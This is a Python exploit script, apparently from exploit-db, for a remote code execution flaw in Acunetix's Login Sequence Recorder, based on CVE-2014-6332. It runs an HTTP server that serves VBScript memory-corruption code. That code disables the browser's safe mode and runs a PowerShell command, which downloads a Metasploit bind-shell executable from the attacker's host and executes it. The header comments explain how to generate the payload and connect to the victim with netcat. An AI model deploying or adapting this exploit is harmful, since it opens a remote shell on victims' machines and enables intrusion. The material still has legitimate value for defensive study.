|
- #!/usr/bin/python
- import BaseHTTPServer, sys, socket
- ##
- # Acunetix OLE Automation Array Remote Code Execution
- #
- # Author: Naser Farhadi
- # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
- #
- # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
- # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
- # Target Login Sequence
- # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
- # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
- # Metasploit windows/shell_bind_tcp Executable Payload
- # And Finally You Can Connect To Victim Machine Using Netcat
- # Usage:
- # chmod +x acunetix.py
- # ./acunetix.py
- # Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
- # nc 192.168.1.7 333
- # Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
- #
- # Video: https://vid.me/SRCb
- ##
- class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
- def do_GET(req):
- req.send_response(200)
- if req.path == "/acunetix.exe":
- req.send_header('Content-type', 'application/exe')
- req.end_headers()
- exe = open("acunetix.exe", 'rb')
- req.wfile.write(exe.read())
- exe.close()
- else:
- req.send_header('Content-type', 'text/html')
- req.end_headers()
- req.wfile.write("""Please scan me!
- <SCRIPT LANGUAGE="VBScript">
- function runmumaa()
- On Error Resume Next
- set shell=createobject("Shell.Application")
- command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
- 'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
- shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
- end function
- dim aa()
- dim ab()
- dim a0
- dim a1
- dim a2
- dim a3
- dim win9x
- dim intVersion
- dim rnda
- dim funclass
- dim myarray
- Begin()
- function Begin()
- On Error Resume Next
- info=Navigator.UserAgent
- if(instr(info,"Win64")>0) then
- exit function
- end if
- if (instr(info,"MSIE")>0) then
- intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
- else
- exit function
-
- end if
- win9x=0
- BeginInit()
- If Create()=True Then
- myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
- myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
- if(intVersion<4) then
- document.write("<br> IE")
- document.write(intVersion)
- runshellcode()
- else
- setnotsafemode()
- end if
- end if
- end function
- function BeginInit()
- Randomize()
- redim aa(5)
- redim ab(5)
- a0=13+17*rnd(6)
- a3=7+3*rnd(5)
- end function
- function Create()
- On Error Resume Next
- dim i
- Create=False
- For i = 0 To 400
- If Over()=True Then
- ' document.write(i)
- Create=True
- Exit For
- End If
- Next
- end function
- sub testaa()
- end sub
- function mydata()
- On Error Resume Next
- i=testaa
- i=null
- redim Preserve aa(a2)
-
- ab(0)=0
- aa(a1)=i
- ab(0)=6.36598737437801E-314
- aa(a1+2)=myarray
- ab(2)=1.74088534731324E-310
- mydata=aa(a1)
- redim Preserve aa(a0)
- end function
- function setnotsafemode()
- On Error Resume Next
- i=mydata()
- i=readmemo(i+8)
- i=readmemo(i+16)
- j=readmemo(i+&h134)
- for k=0 to &h60 step 4
- j=readmemo(i+&h120+k)
- if(j=14) then
- j=0
- redim Preserve aa(a2)
- aa(a1+2)(i+&h11c+k)=ab(4)
- redim Preserve aa(a0)
- j=0
- j=readmemo(i+&h120+k)
-
- Exit for
- end if
- next
- ab(2)=1.69759663316747E-313
- runmumaa()
- end function
- function Over()
- On Error Resume Next
- dim type1,type2,type3
- Over=False
- a0=a0+a3
- a1=a0+2
- a2=a0+&h8000000
-
- redim Preserve aa(a0)
- redim ab(a0)
-
- redim Preserve aa(a2)
-
- type1=1
- ab(0)=1.123456789012345678901234567890
- aa(a0)=10
-
- If(IsObject(aa(a1-1)) = False) Then
- if(intVersion<4) then
- mem=cint(a0+1)*16
- j=vartype(aa(a1-1))
- if((j=mem+4) or (j*8=mem+8)) then
- if(vartype(aa(a1-1))<>0) Then
- If(IsObject(aa(a1)) = False ) Then
- type1=VarType(aa(a1))
- end if
- end if
- else
- redim Preserve aa(a0)
- exit function
- end if
- else
- if(vartype(aa(a1-1))<>0) Then
- If(IsObject(aa(a1)) = False ) Then
- type1=VarType(aa(a1))
- end if
- end if
- end if
- end if
-
-
- If(type1=&h2f66) Then
- Over=True
- End If
- If(type1=&hB9AD) Then
- Over=True
- win9x=1
- End If
- redim Preserve aa(a0)
-
- end function
- function ReadMemo(add)
- On Error Resume Next
- redim Preserve aa(a2)
-
- ab(0)=0
- aa(a1)=add+4
- ab(0)=1.69759663316747E-313
- ReadMemo=lenb(aa(a1))
-
- ab(0)=0
-
- redim Preserve aa(a0)
- end function
- </script>""")
- if __name__ == '__main__':
- sclass = BaseHTTPServer.HTTPServer
- server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
- print "Http server started", socket.gethostbyname(socket.gethostname()), 80
- try:
- server.serve_forever()
- except KeyboardInterrupt:
- pass
- server.server_close()
复制代码
https://www.exploit-db.com/exploits/36516/
|
|